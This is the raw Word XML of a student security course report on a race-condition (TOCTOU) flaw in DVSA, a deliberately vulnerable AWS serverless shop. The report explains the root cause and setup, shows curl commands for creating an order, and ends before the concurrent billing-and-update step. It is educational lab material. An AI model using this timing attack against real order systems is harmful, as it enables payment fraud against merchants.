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85517" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00CF50AC">
      <w:pPr>
        <w:spacing w:before="2400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F5082F" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ICS-344: Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147A8BA" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Course Project: DVSA Vulnerability Discovery and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35209D25" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F396969" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00CF50AC">
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188DC5BD" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lesson #8: Logic Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA8495" w14:textId="339A1F1C" w:rsidR="00CF50AC" w:rsidRDefault="00000000" w:rsidP="00B82184">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(Race Condition in Order-Processing Workflow)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD4C73" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00CF50AC">
      <w:pPr>
        <w:sectPr w:rsidR="00CF50AC" w:rsidSect="00B82184">
          <w:pgSz w:w="12240" w:h="15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pPr>
    </w:p>
    <w:p w14:paraId="425ACF70" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 1) Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D4D8AD" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The goal of Lesson #8 is to demonstrate a logic vulnerability caused by a race condition in the DVSA order-processing workflow. The main affected components are API Gateway and the Lambda functions responsible for billing (DVSA-ORDER-BILLING) and order management (DVSA-ORDER-MANAGER), along with the DynamoDB table (DVSA-ORDERS-DB) that stores order state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70892848" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>In the normal design, an order should move through a controlled sequence: creation → update (while still open) → billing → paid/shipped. The backend should not allow conflicting operations to modify the same order at the same time. However, in DVSA, if a billing request and an update request are sent simultaneously against the same order, both can be processed concurrently by separate Lambda invocations. This allows an attacker to pay for 1 item but end up with 5 items in the final order record, constituting financial fraud through a timing-based logic exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DB3E47" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 2) Why This Works / Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF107D3" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability exists because the order-processing pipeline does not enforce mutual exclusion or state locking during the billing stage. When a user submits a billing request, the backend begins processing the payment. However, the order record in DynamoDB remains modifiable during this window because no conditional write or status lock is applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C62848" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The root cause is a Time-of-Check-to-Time-of-Use (TOCTOU) flaw:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17042AF3" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The billing function reads the order total at one point in time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F0691F" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The update function modifies the order items concurrently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD909F" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The billing function completes payment based on the original (stale) total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1ECBF" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The final DynamoDB record shows the updated items but the old billed amount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23040BB8" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Because serverless functions execute independently and DynamoDB does not enforce application-level transaction boundaries by default, there is no mechanism preventing this race condition. In a correct implementation, once billing is initiated, the order status should be locked and any subsequent update requests should be rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D424B63" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 3) Environment and Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235301FD" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The following environment and setup details are required to reproduce this lesson:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280057A" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DVSA Website URL: </w:t>
      </w:r>
      <w:r>
        <w:t>dvsa-website-kfupm-887984594922-us-east-1.s3-website-us-east-1.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445EE67F" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">API Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:t>Obtained from API Gateway → Stages → Invoke URL + /order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD736D" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AWS Services Involved: </w:t>
      </w:r>
      <w:r>
        <w:t>API Gateway, AWS Lambda (DVSA-ORDER-MANAGER, DVSA-ORDER-BILLING), DynamoDB (DVSA-ORDERS-DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01D58C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">User Context: </w:t>
      </w:r>
      <w:r>
        <w:t>A single authenticated non-admin user with a valid JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A1123" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: </w:t>
      </w:r>
      <w:r>
        <w:t>Browser DevTools (to capture JWT and API URL), curl, jq, bash, AWS Console (CloudWatch Logs, DynamoDB console)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172024D0" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prerequisite Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473102C6" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Deploy DVSA and verify the website is accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E443D26" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2. Log in to DVSA, go to Orders, and open DevTools (F12) → Network tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA9EC3" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>3. Click on any order request, then from the Headers tab copy the Request URL and Authorization token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D99560" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4. Export the values in your terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37446B5A" w14:textId="2A7E96EE" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>export API="https://</w:t>
      </w:r>
      <w:r w:rsidR="00330F91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00330F91" w:rsidRPr="00330F91">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00330F91" w:rsidRPr="00330F91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4pl0</w:t>
      </w:r>
      <w:r w:rsidR="00330F91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.execute-api.us-east-1.amazonaws.com/dvsa/order"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D72FB0" w14:textId="244F8A3D" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>export TOKEN="</w:t>
      </w:r>
      <w:r w:rsidR="00330F91" w:rsidRPr="00330F91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eyJraWQiOiJ2</w:t>
      </w:r>
      <w:r w:rsidR="00330F91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>…”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D6488" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 4) Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1676F7" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This exploit involves creating a fresh order with 1 item, adding shipping details, then simultaneously sending a billing request and an update request that changes the quantity to 5. The attack was automated using a bash script that creates a fresh order for each attempt, since the race condition requires precise timing that may not succeed on the first try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DEDF76" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1 — Create a Fresh Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F83C3" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Create a new order with 1 item (low quantity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADEBE22" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E310693" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D628B8" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E4E34C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"action":"new","cart-id":"race-test-001","items":{"1":1}}' | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0CD40" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Observed result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C48F50" w14:textId="77777777" w:rsidR="00330F91" w:rsidRDefault="00330F91" w:rsidP="00330F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Pr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAA125" w14:textId="77777777" w:rsidR="00330F91" w:rsidRDefault="00330F91" w:rsidP="00330F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Pr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5620F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="39C026"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"ok"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4BAF1" w14:textId="77777777" w:rsidR="00330F91" w:rsidRDefault="00330F91" w:rsidP="00330F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Pr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5620F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"msg"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="39C026"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"order created"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554499B9" w14:textId="77777777" w:rsidR="00330F91" w:rsidRDefault="00330F91" w:rsidP="00330F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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5620F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5620F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5620F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="39C026"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"32199499-d1dc-40c0-88e4-43bf8f93b76c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9B114" w14:textId="77777777" w:rsidR="00330F91" w:rsidRDefault="00330F91" w:rsidP="00330F91">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F858A9A" w14:textId="495AFEB1" w:rsidR="00CF50AC" w:rsidRDefault="00000000" w:rsidP="00330F91">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Save the order ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21230D64" w14:textId="3899ACE1" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>export ORDER_ID</w:t>
      </w:r>
      <w:r w:rsidR="00330F91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00330F91" w:rsidRPr="00330F91">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00330F91" w:rsidRPr="00330F91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"32199499-d1dc-40c0-88e4-43bf8f93b76c"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F50AC" w14:paraId="65528C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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="282D1A31" w14:textId="134FDF60" w:rsidR="00CF50AC" w:rsidRDefault="00330F91" w:rsidP="00330F91">
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r w:rsidRPr="00330F91">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A392795" wp14:editId="7DB08ACB">
                  <wp:extent cx="5943600" cy="1737995"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:docPr id="29905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58815" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1737995"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
